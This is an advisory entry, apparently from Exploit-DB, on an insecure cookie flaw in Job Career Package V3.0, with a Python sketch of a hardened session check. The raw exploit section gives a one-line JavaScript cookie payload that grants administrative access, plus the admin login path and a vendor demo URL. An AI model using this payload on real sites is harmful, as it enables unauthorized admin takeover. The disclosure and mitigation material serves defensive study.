Vendor: Job Career Package
By: TiGeR-Dz
CVSS: 8.8 (HIGH)
Type: Insecure Cookie Handling
CWE: 614
Product Name: Job Career Package
Affected Version From: V3.0
Affected Version To: V3.0
Patch Exists: NO
Related CWE: N/A
CPE: a:t-dreams:job_career_package
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Job Career Package V3.0 Insecure Cookie Handling Vulnerability

A vulnerability exists in Job Career Package V3.0 which allows an attacker to gain administrative access to the application by setting a cookie. An attacker can exploit this vulnerability by setting the cookie 'JobCareerAdmin=Login;path=/' using JavaScript.

Mitigation:

Ensure that cookies are properly validated and sanitized before being used.
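
The flaw described above next to a hardened check, as an added Python sketch (not the vendor's code, which is ASP and is not shown on this page). The cookie name JobCareerAdmin and value Login come from the advisory; admin_session, the 15-minute lifetime and the in-memory store are assumptions made for illustration.

```python
import secrets
import time

ADMIN_COOKIE = "JobCareerAdmin"    # cookie name taken from the advisory
SESSION_COOKIE = "admin_session"   # hypothetical name for the hardened design
SESSION_TTL = 900                  # assumed lifetime in seconds (15 minutes)

_sessions = {}  # server-side store: token -> (username, expiry timestamp)


def is_admin_insecure(cookies):
    """Flawed pattern from the advisory: a fixed, client-settable cookie
    value is the only thing that decides whether the caller is an admin."""
    return cookies.get(ADMIN_COOKIE) == "Login"


def create_session(username, now=None):
    """Call only after the password was verified on the server.
    Returns a Set-Cookie value carrying an unguessable random token."""
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
    _sessions[token] = (username, now + SESSION_TTL)
    return (f"{SESSION_COOKIE}={token}; Path=/Admin; "
            "HttpOnly; Secure; SameSite=Strict")


def is_admin_hardened(cookies, now=None):
    """Grant access only for a token this server issued and that is
    still within its lifetime; anything else is treated as anonymous."""
    now = time.time() if now is None else now
    token = cookies.get(SESSION_COOKIE, "")
    entry = _sessions.get(token)
    if entry is None:
        return False
    _username, expiry = entry
    if expiry <= now:
        del _sessions[token]  # expired sessions are removed on sight
        return False
    return True
```

The cookie now carries only a lookup key; the authorization state lives on the server, so a value written into the browser by hand matches nothing.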
Exploit-DB raw data:

---------------------------------------------------------------
---------------------------------------------------------------
Job Career Package  V3.0  Insecure Cookie Handling Vulnerability
---------------------------------------------------------------
Founder : TiGeR-Dz
Home:WwW.h4ckF0u.CoM
Vendor:http://www.t-dreams.com
---------------------------------------------------------------
---------------------------------------------------------------
Job Career Package  V3.0  Insecure Cookie Handling Vulnerability
------------------------------------------------
http://victim/[path]/Admin/login.asp

Exploit
-------
javascript:document.cookie="JobCareerAdmin=Login;path=/";
Dem0
----
http://www.t-dreams.com/demo/jobcareerv3/Admin/login.asp
--------------------------------------

Greeting To ALL My Friends (Dz)
----------------------------------------------------------------

# milw0rm.com [2009-05-07]